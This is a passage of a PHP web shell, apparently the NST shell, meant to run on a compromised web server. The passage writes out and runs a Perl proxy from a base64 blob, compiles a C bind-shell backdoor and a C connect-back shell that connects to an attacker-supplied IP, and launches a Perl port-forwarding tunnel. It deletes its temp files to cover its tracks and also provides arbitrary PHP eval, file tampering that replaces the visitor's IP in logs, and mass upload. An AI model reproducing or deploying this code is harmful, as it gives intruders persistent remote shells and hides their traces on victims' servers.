tfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg=="; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_proxy.pl","w"); fwrite($fp,base64_decode($perl_proxy_scp)); passthru("perl /tmp/nst_perl_proxy.pl $port &"); unlink("/tmp/nst_perl_proxy.pl"); }else{ if(is_writable(".")){ mkdir(".nst_proxy_tmp"); $fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); fwrite($fp,base64_decode($perl_proxy_scp)); passthru("perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); rmdir(".nst_proxy_tmp"); } } $show_ps="1"; }#end of start perl_proxy if($_POST['c_bd']){ $port=$_POST['port']; $c_bd_scp = "#define PORT $port #include <stdio.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if (soc_rc != 0) exit(-1); if (fork() != 0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl(\"/bin/sh\",\"sh\",(char *)0); close(soc_cli); exit(0); } close(soc_cli); } } "; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_c_bd.c","w"); fwrite($fp,"$c_bd_scp"); passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); passthru("/tmp/nst_bd &"); unlink("/tmp/nst_c_bd.c"); unlink("/tmp/nst_bd"); }else{ if(is_writable(".")){ mkdir(".nst_bd_tmp"); $fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); fwrite($fp,"$c_bd_scp"); passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); passthru(".nst_bd_tmp/nst_bd &"); unlink(".nst_bd_tmp/nst_bd"); unlink(".nst_bd_tmp/nst_c_bd.c"); rmdir(".nst_bd_tmp"); } } $show_ps="1"; }#end of c bd if($_POST['bc_c']){ # nc -l -p 4500 $port_c = $_POST['port_c']; $ip=$_POST['ip']; $bc_c_scp = "#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <netdb.h> int fd, sock; int port = $port_c; struct sockaddr_in addr; char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; char shell[] = \"/bin/sh\"; int main(int argc, char *argv[]) { while(argc<2) { fprintf(stderr, \" %s <ip> \", argv[0]); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(argv[1]); fd = socket(AF_INET, SOCK_STREAM, 0); connect(fd, (struct sockaddr*)&addr, sizeof(addr)); send(fd, mesg, sizeof(mesg), 0); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); execl(shell, \"in.telnetd\", 0); close(fd); return 1; } "; if(is_writable("/tmp")){ if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} $fp=fopen("/tmp/nst_c_bc_c.c","w"); $bd_c_scp=str_replace("!n","\n",$bd_c_scp); fwrite($fp,"$bc_c_scp"); passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); passthru("/tmp/nst_bc_c $ip &"); unlink("/tmp/nst_bc_c"); unlink("/tmp/nst_bc_c.c"); }else{ if(is_writable(".")){ mkdir(".nst_bc_c_tmp"); $fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); $bd_c_scp=str_replace("!n","\n",$bd_c_scp); fwrite($fp,"$bc_c_scp"); passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); passthru(".nst_bc_c_tmp/nst_bc_c $ip &"); unlink(".nst_bc_c_tmp/nst_bc_c.c"); unlink(".nst_bc_c_tmp/nst_bc_c"); rmdir(".nst_bc_c_tmp"); } } $show_ps="1"; }#end of back connect C if($_POST['datapipe_pl']){ $port_2=$_POST['port_2']; $port_3=$_POST['port_3']; $ip=$_POST['ip']; $datapipe_pl = " #!/usr/bin/perl # coded by CuTTer (rus hacker) use IO::Socket; use POSIX; \$localport=$port_2; \$host=\"$ip\"; \$port=$port_3; \$daemon=1; \$DIR = undef; ## أ‚أ»أ¢أ®أ¤أ¨أ²أ¼ أ«أ®أ£ أ±أ®أ،أ»أ²أ¨أ© (1-أ¤أ , 0-أأ¥أ²) \$log=0; \$| = 1; if (\$daemon){ print \"3anycKaeM daemon\n\"; \$pid = fork; exit if \$pid; die \"Couldn't fork: \$!\" unless defined(\$pid); POSIX::setsid() or die \"Can't start a new session: \$!\"; } %o = ('port' => \$localport, 'toport' => \$port, 'tohost' => \$host); \$ah = IO::Socket::INET->new( 'LocalPort' => \$localport, 'Reuse' => 1, 'Listen' => 10) || die \"أچأ¥أ«أ¼أ§أ؟ أ®أ²أھأ°أ»أ²أ¼ أ±أ®أھأ¥أ² أ¤أ«أ؟ أ±أ®أ¥أ¤أ¨أأ¥أأ¨أ©: \$!\"; print \"أچأ أ·أ¨أأ أ¥أ¬ أ¢أ»أ¯أ®أ«أأ¥أأ¨أ؟ أ¶أ¨أھأ«أ .\n\" if \$log; \$SIG{'CHLD'} = 'IGNORE'; \$num = 0; while (1) { \$ch = \$ah->accept(); if (!\$ch) { print STDERR \"أڈأ°أ¥أ°أ¢أ أأ® أ¢أ»أ¯أ®أ«أ¥أأ¨أ¥ accept: \$!\n\"; next; } printf(\"أچأ®أ¢أ»أ© أھأ«أ¨أ¥أأ²: host %s, port %s.\n\", \$ch->peerhost(), \$ch->peerport()) if \$log; ++\$num; \$pid = fork(); if (!defined(\$pid)) { print STDERR \"أچأ¥أ¢أ®أ§أ¬أ®أ¦أأ® أ¢أ»أ¯أ®أ«أأ¨أ²أ¼ fork: \$!\n\"; } elsif (\$pid == 0) { ## أچأ®أ¢أ»أ© أ¯أ°أ®أ¶أ¥أ±أ± \$ah->close(); Run(\%o, \$ch, \$num); } else { print \"Parent: Fork أ¯أ°أ®أ¸أ¥أ« أ³أ±أ¯أ¥أ¸أأ®, أ§أ أھأ°أ»أ¢أ أ¥أ¬ أ±أ®أھأ¥أ².\n\" if \$log; \$ch->close(); } } sub Run { my(\$o, \$ch, \$num) = @_; my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, 'PeerPort' => \$o->{'toport'}); print(\"Child: أ„أ¥أ«أ أ¥أ¬ أ°أ¥أ¤أ¨أ°أ¥أھأ² أأ \$o->{'tohost'}, أ¯أ®أ°أ² \$o->{'toport'}.\n\") if \$log; if (!\$th) { printf STDERR (\"Child: أڈأ°أ¥أ°أ¢أ أ أ°أ¥أ¤أ¨أ°أ¥أھأ² أأ %s, أ¯أ®أ°أ² %s.\n\", \$o->{'tohost'}, \$o->{'toport'}); exit 0; } my \$fh; if (\$o->{'dir'}) { \$fh = Symbol::gensym(); open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") or die \"Child: أڈأ°أ¥أ°أ¢أ أأ® أ±أ®أ§أ¤أ أأ¨أ¥ أ«أ®أ£ أ´أ أ©أ«أ \$o->{'dir'}/tunnel\$num.log: \$!\"; } \$ch->autoflush(); \$th->autoflush(); while (\$ch || \$th) { print \"Child: أ‚أھأ«أ¾أ·أ أ¥أ¬ أ¶أ¨أھأ«.\n\" if \$log; my \$rin = \"\"; vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; vec(\$rin, fileno(\$th), 1) = 1 if \$th; my(\$rout, \$eout); select(\$rout = \$rin, undef, \$eout = \$rin, 120); if (!\$rout && !\$eout) { print STDERR \"Child: أژأ¸أ¨أ،أھأ Timeout.\n\"; } my \$cbuffer = \"\"; my \$tbuffer = \"\"; if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { print \"Child: أ†أ¤أ¥أ¬ أ¤أ أأأ»أµ أ®أ² أھأ«أ¨أ¥أأ²أ .\n\" if \$log; my \$result = sysread(\$ch, \$tbuffer, 1024); if (!defined(\$result)) { print STDERR \"Child: أژأ¸أ¨أ،أھأ أ¯أ°أ¨ أ±أ·أ¨أ²أ»أ¢أ أأ¨أ¨ أ¤أ أأأ»أµ أھأ«أ¨أ¥أأ²أ : \$!\n\"; exit 0; } if (\$result == 0) { print \"Child: أٹأ«أ¨أ¥أأ² أ®أ²أ±أ®أ¥أ¤أ¨أأ¨أ«أ±أ؟.\n\" if \$log; exit 0; } print \"Child: أ„أ أأأ»أ¥: \$cbuffer\n\" if \$log; } if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { print \"Child: أ†أ¤أ¥أ¬ أ¤أ أأأ»أµ.\n\" if \$log; my \$result = sysread(\$th, \$cbuffer, 1024); if (!defined(\$result)) { print STDERR \"Child: أچأ¥أ¢أ®أ§أ¬أ®أ¦أأ® أ±أ·أ¨أ²أ أ²أ¼ أ¤أ أأأ»أ¥: \$!\n\"; exit 0; } if (\$result == 0) { print \"Child: أڈأ°أ®أ¨أ§أ®أ¸أ«أ® أ®أ²أ±أ®أ¥أ¤أ¨أأ¥أأ¨أ¥.\n\" if \$log; exit 0; } print \"Child: أ„أ أأأ»أ¥: \$cbuffer\n\" if \$log; } if (\$fh && \$tbuffer) { (print \$fh \$tbuffer); } while (my \$len = length(\$tbuffer)) { print \"Child: أژأ²أ¯أ°أ أ¢أ«أ؟أ¥أ¬ \$len أ،أ أ©أ².\n\" if \$log; my \$res = syswrite(\$th, \$tbuffer, \$len); print \"Child: أ„أ أأأ»أ¥ أ®أ²أ¯أ°أ أ¢أ«أ¥أأ».\n\" if \$log; if (\$res > 0) { \$tbuffer = substr(\$tbuffer, \$res); } else { print STDERR \"Child: أچأ¥أ¢أ®أ§أ¬أ®أ¦أأ® أ®أ²أ¯أ°أ أ¢أ¨أ²أ¼ أ¤أ أأأ»أ¥: \$!\n\"; } } while (my \$len = length(\$cbuffer)) { print \"Child: أژأ²أ¯أ°أ أ¢أ«أ؟أ¥أ¬ \$len أ،أ أ©أ² أھأ«أ¨أ¥أأ²أ³.\n\" if \$log; my \$res = syswrite(\$ch, \$cbuffer, \$len); print \"Child: أ„أ أأأ»أ¥ أ®أ²أ¯أ°أ أ¢أ«أ¥أأ»..\n\" if \$log; if (\$res > 0) { \$cbuffer = substr(\$cbuffer, \$res); } else { print STDERR \"Child: أچأ¥أ¢أ®أ§أ¬أ®أ¦أأ® أ®أ²أ¯أ°أ أ¢أ¨أ²أ¼ أ¤أ أأأ»أ¥: \$!\n\"; } } } } "; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_datapipe.pl","w"); fwrite($fp,"$datapipe_pl"); passthru("perl /tmp/nst_perl_datapipe.pl &"); unlink("/tmp/nst_perl_datapipe.pl"); }else{ if(is_writable(".")){ mkdir(".nst_datapipe_tmp"); $fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); fwrite($fp,"$datapipe_pl"); passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); rmdir(".nst_datapipe_tmp"); } } $show_ps="1"; }#end of datapipe perl if($show_ps=="1"){ print "<center><b>[ps ux]</b></center><br /><br />"; print "<pre>"; passthru("ps ux"); print "</pre><br /><br />"; } echo "<form method="post"><b>md5:</b><br /><input name="md5" size="30" /><br /> md5 online encoder/decoder (brutforce) (php) - [<a href="http://nst.void.ru/down_sys_scripts.php?get=nst_online_md5_cd.rar">DOWNLOAD</a>] </form> "; @$md5=@$_POST['md5']; if(@$_POST['md5']){ echo "md5:<br /><textarea rows="1" cols="113">".md5($md5)."</textarea>";} echo "<br /><form method="post"><b>base64 e/d:</b><br /><input name="base64" size="30" /></form><br />"; if(@$_POST['base64']){ @$base64=$_POST['base64']; echo " <b>Encode: <br /><textarea rows="15" cols="113">".base64_encode($base64)."</textarea><br /> Decode:</b><br /><textarea rows="15" cols="113">".base64_decode($base64)."</textarea><br />";} echo "<br /><form method="post"><b>DES:</b><br /><input name="des" size="30" /><br /> John The Ripper [<a href="http://www.openwall.com/john/" target="_blank">Web</a>]</form><br />"; if(@$_POST['des']){ @$des=@$_POST['des']; echo "<b>Des:</b><br /><textarea rows="15" cols="113">".crypt($des)."</textarea>";} print " <b>eval:</b<br /> (example: print \"Hello World\";) <form method="post"><font color="red"><b><?</b><br /><textarea name="eval" rows="15" cols="113"></textarea><br /><b>?></b></font><br /><input type="submit" value="Run" style="width:150px;" /></form><br /> "; function eval_sl($editf){ if(get_magic_quotes_gpc()==1){ $editf=stripslashes($editf); } return $editf; } if($_POST['eval']){ print "<b>RESULT:<br /><br /></b>"; eval(eval_sl($_POST['eval'])); print "<br /><br />"; print "<font color="green"><b>PHP:</b><br />\r\n\r\n"; print "<?\r\n"; print "<br />"; print htmlspecialchars(eval_sl(($_POST['eval']))); print "<br />"; print "?>\r\n\r\n</font><br /><br />"; } echo $copyr; exit;} if(@$_GET['replace']=="1"){ $ip=@$_SERVER['REMOTE_ADDR']; $d=$_GET['d']; $e=$_GET['e']; @$de=$d."/".$e; $de=str_replace("//","/",$de); $e=@$e; echo "[<a href="$php_self?d=$d&del_f=1&wich_f=$e">Delete</a>] [<a href="$php_self?d=$d&ef=$e&edit=1">Edit</a>] [<a href="$php_self?d=$d&e=$e&clean=1">Filesize to 0 byte</a>] [<a href="$php_self?d=$d&e=$e&replace=1">Replace text in file</a>] [<a href="$php_self?d=$d&download=$e">Download</a>] [<a href="$php_self?d=$d&rename=1&wich_f=$e">Rename</a>] [<a href="$php_self?d=$d&chmod=1&wich_f=$e">CHMOD</a>] [<a href="$php_self?d=$d&ccopy_to=$e">Copy</a>]<br />"; echo " Replace tool:<br /> (You can replace any text)<br /> File: $de<br /><form method="post"> 1. Your ip.<br /> 2. microsoft.com ip :)<br /> Replace this <input name="this" size="30" value="$ip" /> by this <input name="bythis" size="30" value="207.46.245.156" /><input name="doit" type="submit" value="Replace" /></form> "; if(@$_POST['doit']){ @$this=$_POST['this']; @$bythis=$_POST['bythis']; @$e=$_GET['e']; $filename="$d/$e"; $fd = @fopen ($filename, "r"); $rpl = @fread ($fd, @filesize ($filename)); $re=str_replace("$this","$bythis",$rpl); $x=@fopen("$d/$e","w"); @fwrite($x,"$re"); echo "<br /><center>$this Replaced by $bythis<br /> [<a href="$php_self?d=$d&e=$e">VIew file</a>]<br /><br /><br />"; } echo $copyr; exit;} if(@$_GET['t']=="upload"){ echo "<br /><a href="$php_self?d=$d&t=massupload">* Mass upload *</a><br /> File upload:<br /><form enctype="\\"multipart/form-data\" method="post"><input name="text" size="50" type="file" /><br /><input name="where" size="52" value="$d" /><br /> New file name:<br /><input name="newf" size="30" autocomplete="off" /> (if empty, it will be default)<br /><input name="uploadf" type="submit" value="Upload" /></form><br /> "; if(@$_POST['uploadf']){ $where=$_POST['where']; $newf=$_POST['newf']; $where=str_replace("//","/",$where); if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} $uploadfile = "$where/".$newf; if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { $uploadfile=str_replace("//","/",$uploadfile); echo "<i><br />Uploaded to $uploadfile</i><br />"; }else{ echo "<i><br />Error</i><br />";} } } if(@$_GET['t']=="massupload"){ echo " Mass upload:<br /><form enctype="\\"multipart/form-data\" method="post"><input name="text1" size="43" type="file" /><input name="text11" size="43" type="file" /><br /><input name="text2" size="43" type="file" /><input name="text12" size="43" type="file" /><br /><input name="text3" size="43" type="file" /><input name="text13" size="43" type="file" /><br /><input name="text4" size="43" type="file" /><input name="text14" size="43" type="file" /><br /><input name="text5" size="43" type="file" /><input name="text15" size="43" type="file" /><br /><input name="text6" size="43" type="file" /><input name="text16" size="43" type="file" /><br /><input name="text7" size="43" type="file" /><input name="text17" size="43" type="file" /><br /><input name="text8" size="43" type="file" /><input name="text18" size="43" type="file" /><br /><input name="text9" size="43" type="file" /><input name="text19" size="43" type="file" /><br /><input name="text10" size="43" type="file" /><input name="text20" size="43" type="file" /><br /><input name="where" size="43" value="$d" /><br /><input name="massupload" type="submit" value="Upload" /></form><br />"; if(@$_POST['massupload']){ $where=@$_POST['where']; $uploadfile1 = "$where/".@$_FILES['text1']['name']; $uploadfile2 = "$where/".@$_FILES['text2']['name']; $uploadfile3 = "$where/".@$_FILES['text3']['name']; $uploadfile4 = "$where/".@$_FILES['text4']['name']; $uploadfile5 = "$where/".@$_FILES['text5']['name']; $uploadfile6 = "$where/".@$_FILES['text6']['name']; $uploadfile7 = "$where/".@$_FILES['text7']['name']; $uploadfile8 = "$where/".@$_FILES['text8']['name']; $uploadfile9 = "$where/".@$_FILES['text9']['name']; $uploadfile10 = "$where/".@$_FILES['text10']['name']; $uploadfile11 = "$where/".@$_FILES['text11']['name']; $uploadfile12 = "$where/".@$_FILES['text12']['name']; $uploadfile13 = "$where/".@$_FILES['text13']['name']; $uploadfile14 = "$where/".@$_FILES['text14']['name']; $uploadfile15 = "$where/".@$_FILES['text15']['name']; $uploadfile16 = "$where/".@$_FILES['text16']['name']; $uploadfile17 = "$where/".@$_FILES['text17']['name']; $uploadfile18 = "$where/".@$_FILES['text18']['name']; $uploadfile19 = "$where/".@$_FILES['text19']['name']; $uploadfile20 = "$where/".@$_FILES['text20']['name']; if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile1</i><br />";} if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile2</i><br />";} if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile3</i><br />";} if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile4</i><br />";} if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile5</i><br />";} if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile6</i><br />";} if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile7</i><br />";} if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile8</i><br />";} if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile9</i><br />";} if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile10</i><br />";} if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile11</i><br />";} if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile12</i><br />";} if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile13</i><br />";} if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile14</i><br />";} if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], 